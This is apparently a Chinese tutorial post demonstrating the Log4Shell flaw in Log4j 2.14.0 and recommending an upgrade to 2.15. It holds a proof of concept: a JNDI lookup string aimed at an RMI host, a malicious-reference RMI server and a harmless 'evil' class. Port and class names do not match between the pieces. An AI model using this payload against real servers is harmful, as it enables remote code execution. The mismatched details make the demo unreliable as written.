依赖版本，必须是2.14.0之前的版本，但是现在（官网、阿里云仓库）下载到的jar包都是已经被官方修复过的了。

<dependencies>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.14.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.0</version>
    </dependency>
</dependencies>

package com.example.log4jdemo;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class Log4jdemoApplication {

    private static final Logger log = LogManager.getLogger();

    public static void main(String[] args) {
        String userName = "${java:os}";
//        String userName = "${jndi:rmi://192.168.65.31:1099/evil}";
        log.info("Hello, {}!", userName);
    }
}

package com.example.log4jdemo.com.zengwx.log4jdemo;

public class EvilObj {
    static  {
        System.out.println("执行了~~~");
    }
}

package com.example.log4jdemo.com.zengwx.log4jdemo;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {
    public static void main(String[] args) {
        try{
            LocateRegistry.createRegistry(8088);
            Registry registry = LocateRegistry.getRegistry();
            System.out.println("create RMI registry on port 8088");
            Reference reference = new Reference("com.zhouyu.rmi.EvilObj", "com.zhouyu.rmi.EvilObj", "");
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("evil", referenceWrapper);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

解决方案

将log4j的maven版本修改为2.15版本就可以！！！